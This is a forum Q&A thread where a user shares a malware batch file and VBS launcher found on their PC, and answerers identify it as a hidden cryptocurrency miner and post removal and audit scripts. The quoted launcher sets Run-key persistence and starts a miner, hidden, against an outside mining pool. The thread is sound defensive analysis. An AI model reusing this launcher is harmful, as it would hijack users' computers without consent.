
My system was really slow one morning. Task Manager showed that Internet Download Manager was running even though I never installed it. I found its location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU.

A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.

The bat file that started it was:

```bat
@echo off
rem Re-creates the per-user Run value so the .vbs relaunches this .bat, hidden, at every logon
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
rem Starts IDMan.exe detached, pointed at a stratum+tcp pool with the operator's wallet address as the user name
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x
```

The vbs script file in the same folder as the bat file was:

```vbscript
' Runs the first argument (the .bat) with window style 0 (hidden) and does not wait for it (False)
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
```

I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system.

I know this is a trojan of some kind. But could someone please interpret the bat and script files for me, and what information these are sending to ns1.eaglecloud.su?

Thank you

edtheprogrammerguy
  • There is no clue what that "IDMan.exe" could do, I can see how it managed to start each time - modifying registry entry `HKCU\software\microsoft\windows\currentversion\run` (this is where I look when I want to know what starts with the system). – firda Aug 06 '14 at 18:47

2 Answers

```text
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Users\David Candy>nslookup -type=all ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
ns1.eaglecloud.su       internet address = 95.47.160.203

(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

eaglecloud.su
        primary name server = fred.ns.cloudflare.com
        responsible mail addr = dns.cloudflare.com
        serial  = 2015717786
        refresh = 10000 (2 hours 46 mins 40 secs)
        retry   = 2400 (40 mins)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx cloudflare.com
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
cloudflare.com  MX preference = 30, mail exchanger = alt2.aspmx.l.google.com
cloudflare.com  MX preference = 40, mail exchanger = aspmx2.googlemail.com
cloudflare.com  MX preference = 50, mail exchanger = aspmx3.googlemail.com
cloudflare.com  MX preference = 10, mail exchanger = aspmx.l.google.com
cloudflare.com  MX preference = 20, mail exchanger = alt1.aspmx.l.google.com

aspmx2.googlemail.com   internet address = 74.125.193.26
aspmx3.googlemail.com   internet address = 74.125.196.26
aspmx.l.google.com      internet address = 74.125.25.26
alt1.aspmx.l.google.com internet address = 74.125.193.27
alt2.aspmx.l.google.com internet address = 74.125.196.27
(root)  ??? unknown type 41 ???
```

I'd complain to both Cloudflare and Google about it as they are using their infrastructure.

Noodles
  • Google might stop providing email services, but from what I’ve heard, [CloudFlare doesn’t care](http://krebsonsecurity.com/2014/02/the-new-normal-200-400-gbps-ddos-attacks/) ([2](http://blog.cloudflare.com/thoughts-on-abuse)). – icktoofay Aug 07 '14 at 04:50

Sorry to wake an ancient topic, but I have had the same issue. I have a solution though. It's not a Trojan, fortunately.

This malware impersonates an Adobe updater utility. However, Adobe always digitally signs their production programs. It is a bitcoin miner. I found this out by looking up the stratum+tcp protocol which it uses to communicate with the internet. This returned a pageful of results regarding bitcoin miners.

What the batch file actually does is create a new entry in the registry, for the miner to automatically start when you log on. This miner uses your CPU power to mine hashes for Bitcoin, an online currency, similar to how your country would print paper money. As far as I can tell, it doesn't touch any personal files.

Removing both the registry entry and the related files killed it for me. Below is a batch script which does all that for you.

```bat
@echo off
echo Starting removal. Please make sure that you've closed IDMan.exe
pause
rem Remove the autostart value the malware's .bat keeps re-creating
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeFlashPlayer /f
rem Delete the launcher scripts, the miner and the DLLs it ships with
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe"
del "%appdata%\Adobe\Flash Player\PureCache\libcurl.dll"
del "%appdata%\Adobe\Flash Player\PureCache\pthreadGC2.dll"
del "%appdata%\Adobe\Flash Player\PureCache\zlib1.dll"
echo Removal complete.
pause
```

Paste that into a batch file and you should be good to go.
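As an added example (not code from the question or either answer), here is a read-only PowerShell audit for the persistence pattern both posts describe: a value in the per-user Run key that launches wscript/cscript on a script stored under AppData, followed by an Authenticode check on the executables sitting next to it, since, as the second answer notes, genuine Adobe binaries are signed. The registry key and folder layout come from the page; searching the binaries for the string `stratum+tcp` is an assumption that the miner keeps its pool-protocol prefix in cleartext, and the script deletes nothing.

```powershell
# Added example: audit HKCU Run values for script-host launchers under AppData.
$runKey  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$appData = [Environment]::GetFolderPath('ApplicationData')   # ...\AppData\Roaming
$props   = Get-ItemProperty -Path $runKey

# Registry value names, minus the PS* metadata properties Get-ItemProperty adds.
$valueNames = $props.PSObject.Properties |
    Where-Object { $_.Name -notlike 'PS*' } |
    Select-Object -ExpandProperty Name

foreach ($name in $valueNames) {
    $cmd   = [string]$props.$name
    $flags = @()
    if ($cmd -match '(?i)\b[wc]script(\.exe)?\b')                 { $flags += 'launched via wscript/cscript' }
    if ($cmd -match '(?i)\.(vbs|bat|cmd|js)\b')                   { $flags += 'script file on the command line' }
    if ($cmd -like "*$appData*" -or $cmd -match '(?i)%appdata%')  { $flags += 'path under AppData\Roaming' }
    if ($flags.Count -eq 0) { continue }

    Write-Output "Suspicious Run value '$name': $cmd"
    Write-Output "  flags: $($flags -join ', ')"

    # Pull every quoted path from the command line and inspect the folder it points at.
    foreach ($m in [regex]::Matches($cmd, '"([^"]+)"')) {
        $path = [Environment]::ExpandEnvironmentVariables($m.Groups[1].Value)
        $dir  = Split-Path -Path $path -Parent
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($exe in Get-ChildItem -LiteralPath $dir -Filter *.exe -File -ErrorAction SilentlyContinue) {
            $sig    = Get-AuthenticodeSignature -FilePath $exe.FullName
            $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
            Write-Output "  $($exe.FullName): signature=$($sig.Status) signer=$signer"
            # Assumption: a miner started with a stratum+tcp URL keeps that prefix in the binary.
            if (Select-String -LiteralPath $exe.FullName -Pattern 'stratum\+tcp' -Quiet) {
                Write-Output "    contains 'stratum+tcp' (mining-pool protocol)"
            }
        }
    }
}
```

An unsigned executable under AppData\Roaming started through wscript from a Run value is the combination to treat as a finding; a `Valid` signature from a vendor you recognise is the usual benign case.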